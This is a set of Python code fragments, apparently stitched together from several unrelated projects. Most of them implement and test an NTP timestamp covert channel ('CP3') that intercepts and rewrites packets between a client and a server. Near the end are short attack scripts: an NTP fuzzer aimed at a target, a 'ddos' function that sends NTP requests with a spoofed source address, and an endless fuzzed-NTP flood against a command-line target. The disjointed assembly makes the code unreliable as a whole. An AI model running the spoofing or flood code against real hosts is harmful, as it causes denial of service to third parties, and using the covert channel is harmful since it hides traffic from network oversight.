def __restore_ntp_pck(self, ntp: NTP) -> NTP:
self.log.debug('Send timestamp for reconstruction: ' + str(ntp.sent))
sent_time_stamp = datetime.fromtimestamp(
ntplib.ntp_to_system_time(ntp.sent))
sent_time_stamp = sent_time_stamp.replace(year=datetime.now().year)
sent_time_stamp_as_ntp = ntplib.system_to_ntp_time(
sent_time_stamp.timestamp())
ntp.sent = sent_time_stamp_as_ntp
self.log.debug('Send timestamp after reconstruction: ' + str(ntp.sent))
pck = CP3Package(ntp)
if NTPMode.from_bit_string(pck.mode()) is NTPMode.CLIENT:
self.log.debug("Restored in Client mode")
ntp.ref = 0
ntp.orig = 0
ntp.recv = 0
if NTPMode.from_bit_string(pck.mode()) is NTPMode.SERVER \
or NTPMode.from_bit_string(pck.mode()) is NTPMode.BROADCAST_SERVER:
self.log.debug("Restored in Server mode")
origin_last_32 = pck.origin_timestamp()[32:64]
received_last_32 = pck.receive_timestamp()[32:64]
transmit_first_32 = pck.origin_timestamp()[0:32]
pck.set_origin_timestamp(transmit_first_32 + origin_last_32)
pck.set_receive_timestamp(transmit_first_32 + received_last_32)
ntp = pck.ntp()
self.log.debug("Reconstruction complete.")
#ntp.show()
return ntp
def test_get_cp3_mode_pck_has_year_2000_mode_2_returned(self):
# Arrange
ntp_timestamp = ntplib.system_to_ntp_time(datetime.now().replace(year=2000).timestamp())
ntp_pck = NTP()
ntp_pck.sent = ntp_timestamp
pck = CP3Package(ntp_pck=ntp_pck)
# Act
result = pck.get_cp3_mode()
# Assert
self.assertEqual(result, CP3Mode.PCK_2)
def ntp(self) -> NTP:
"""
:return: creates a scapy.NTP package from this raw package representation.
"""
raw = BitArray(bin=self._raw).bytes
ntp = NTP(raw)
return ntp
def handle_pck(self, packet: Packet) -> Packet:
if packet[IP].src == self.server_addr:
if not self.send_payload:
self.log.debug("Sending of payload is deactivated.")
return packet
cp3_pck = CP3Package(packet[NTP])
if self.sending_status == 1:
cp3_pck.set_cp3_mode_1()
else:
cp3_pck.set_cp3_mode_2()
cp3_pck.add_payload(self.__next_payload())
self.log.info('CP3 payload added for intercepted package: ' +
str(cp3_pck.extract_payload()) + " in CP3 mode " +
str(cp3_pck.get_cp3_mode()))
complete_pck = packet[IP] / packet[UDP] / NTP()
complete_pck[NTP] = cp3_pck.ntp()
return complete_pck
elif packet[IP].src == self.client_addr:
cp3_pck = CP3Package(packet[NTP])
if not self.cp3_handler.read_incoming_pck(cp3_pck):
return packet
ntp_restored = self.cp3_handler.restore_pck(cp3_pck)
complete_restored = packet[IP] / packet[UDP] / ntp_restored
complete_restored[NTP] = ntp_restored
return complete_restored
else:
self.log.error(
'The given packet was not matching the sender/receiver address!'
)
return packet
def _send_ntp_client_request(self,
dst='pool.ntp.org',
ntp=NTP()) -> Packet:
pck = IP(dst=dst) / UDP() / ntp
if self.debug:
pck.show()
pck = sr1(pck)
if self.debug:
pck.show()
return pck
def test_check_pck_has_matching_ip_True_Returned(self):
# Arrange
interceptor = CP3Interceptor('3.3.3.3', '4.4.4.4')
pck = IP(dst='1.1.1.1', src='3.3.3.3') / UDP() / NTP()
# Act
result = interceptor.check_pck(pck)
# Assert
self.assertTrue(result)
def test_handle_incoming_pck_is_marked_with_1_msg_added(self):
# Arrange
client = CP3Handler('')
ntp_timestamp = ntplib.system_to_ntp_time(
datetime.now().replace(year=1995).timestamp())
ntp_pck = NTP()
ntp_pck.sent = ntp_timestamp
pck = CP3Package(ntp_pck=ntp_pck)
origin_first_32 = '11111111111110011110111111111111'
received_first_32 = '11111110111111011110111111111111'
last_32 = '11111111111111111111111111111111'
pck.set_origin_timestamp(origin_first_32 + last_32)
pck.set_receive_timestamp(received_first_32 + last_32)
# Act
client.read_incoming_pck(pck)
# Assert
self.assertEqual(origin_first_32 + received_first_32, client.msg)
def run(self, with_response: bool = True):
"""
Starts the sniffing for incoming NTP client packages. Note that further packages are not sniffed while
one package is processed.
"""
print('Starting server.... listening on interface ' +
self.sniff_interface)
while True:
pck = self.next_ntp_packet()
received_time = ntp_time_now()
if pck[IP].dst != self._host_ip:
print('This package was not meant for the server...')
continue
pck_ntp = pck[NTP]
if pck_ntp.mode != 3:
continue
self._req_interceptor.intercept_req(pck_ntp)
if not with_response:
continue
if self.debug:
print('Got a NTP client request, creating response.')
# ntp_resp = self._send_ntp_client_request(ntp=pck_ntp)
response_from_server_ntp = NTP() # ntp_resp[NTP]
response_from_server_ntp.recv = received_time
response_from_server_ntp.ref = self.reference_time
# response_from_server_ntp.id = str(pck[IP].dst)
response_from_server_ntp = self._res_interceptor.intercept_res(
response_from_server_ntp)
response = IP(dst=pck[IP].src,
src=pck[IP].dst) / UDP() / response_from_server_ntp
if self.debug:
response.show()
send(response)
def run(self):
self.log.info('# Start experiment with n=' + str(self._n))
i = 0
while i < self._n:
i += 1
self.log.info('\n### Iteration: ' + str(i) + '/' + str(self._n))
# sleep_time = random.uniform(0, self._max_sleep)
sleep_time = 0
self.log.info('Delay: ' + str(sleep_time))
sleep(sleep_time)
request = IP(dst=self._server_addr) / UDP() / NTP()
response = sr1(request, timeout=2)
if response is None:
self.log.info(
'Error: Server not reached within time. Increasing n by 1')
self._n += 1
self._error_counter_timeout += 1
continue
response[NTP].show()
raw_ntp = RawNTP(response[NTP])
self._process_ntp_result(raw_ntp)
self._show_results()
def init_ntp_pck(num_of_digits_to_fill_up: int = 12) -> NTP:
"""
Creates a new NTP package, fills all 4 64 bit timestamps with the current time and fills up the last bits
with random values, since they are set to 0 by Scapy
:param num_of_digits_to_fill_up: The amount of digits to fill up.
:return: The newly created NTP package
"""
ntp = NTP()
ntp.ref = ntp_time_now()
ntp.sent = ntp_time_now()
ntp.orig = ntp_time_now()
ntp.recv = ntp_time_now()
raw_ntp = RawNTP(ntp)
f_ref = raw_ntp.reference_timestamp()
f_trans = raw_ntp.transmit_timestamp()
f_orig = raw_ntp.origin_timestamp()
f_recv = raw_ntp.receive_timestamp()
for i in range(num_of_digits_to_fill_up):
pos = 64 - i
f_ref = f_ref[:pos - 1] + str(random.randint(0, 1)) + f_ref[pos:]
f_trans = f_trans[:pos - 1] + str(random.randint(0, 1)) + f_trans[pos:]
f_orig = f_orig[:pos - 1] + str(random.randint(0, 1)) + f_orig[pos:]
f_recv = f_recv[:pos - 1] + str(random.randint(0, 1)) + f_recv[pos:]
assert len(f_ref) == 64
assert len(f_trans) == 64
assert len(f_orig) == 64
assert len(f_recv) == 64
raw_ntp.set_reference_timestamp(f_ref)
raw_ntp.set_transmit_timestamp(f_trans)
raw_ntp.set_origin_timestamp(f_orig)
raw_ntp.set_receive_timestamp(f_recv)
ntp = raw_ntp.ntp()
return ntp
def init_ntp_client_pck(num_of_digits_to_fill_up: int = 12):
"""
Creates a new NTP package, fills only the transmit 64 bit timestamps with the current time and fills up the last
bits with random values, since they are set to 0 by Scapy
:param num_of_digits_to_fill_up: The amount of digits to fill up.
:return: The newly created NTP package
"""
ntp = NTP()
ntp.sent = ntp_time_now()
ntp.ref = 0
ntp.orig = 0
ntp.recv = 0
raw_ntp = RawNTP(ntp)
f_trans = raw_ntp.transmit_timestamp()
for i in range(num_of_digits_to_fill_up):
pos = 64 - i
f_trans = f_trans[:pos - 1] + str(random.randint(0, 1)) + f_trans[pos:]
assert len(f_trans) == 64
raw_ntp.set_transmit_timestamp(f_trans)
ntp = raw_ntp.ntp()
return ntp
log = file_logger(path='cp3_experiment_results.log',
logger_name='CP3-Logger')
N = 10000
server_address = '192.168.50.102'
deviations = 0
error_counter = 0
log.info("Starting CP3 distribution experiment with N=" + str(N) +
" and server address=" + str(server_address))
i = 0
while i < N:
i += 1
log.debug("Iteration " + str(i))
ntp = NTP()
ntp.orig = None
request = IP(dst=server_address) / UDP() / ntp
response = sr1(request, timeout=2)
if response is None:
error_counter += 1
i -= 1
log.info('Error: Server not reached within time.')
continue
log.debug("Response from: " + response[IP].src)
ntp_raw = RawNTP(response[NTP])
if (ntp_raw.origin_timestamp()[0:32] != ntp_raw.transmit_timestamp()[0:32]) \
or (ntp_raw.origin_timestamp()[0:32] != ntp_raw.receive_timestamp()[0:32]):
deviations += 1
log.info("Deviation detected")
def main_function(targetip, numberOfPackets):
for i in range(1, int(numberOfPackets)):
sr1(IP(dst=targetip) / fuzz(TCP(dport=80) / NTP(version=4)),
timeout=0) # wysyłanie spoofingu domyślnie na port 80
return 'Fuzzing done'
def ddos(self, client, ntp_server):
ip = IP(src=client, dst=ntp_server)
send(ip / UDP() / NTP())
#!/usr/bin/env python # -*- encoding: utf-8 -*- # __author__ = '090h' __license__ = 'GPL' from sys import argv, exit from scapy.all import * from scapy.layers.inet import IP, UDP from scapy.layers.ntp import NTP send(IP(dst=argv[1]) / fuzz(UDP() / NTP(version=4)), loop=1)
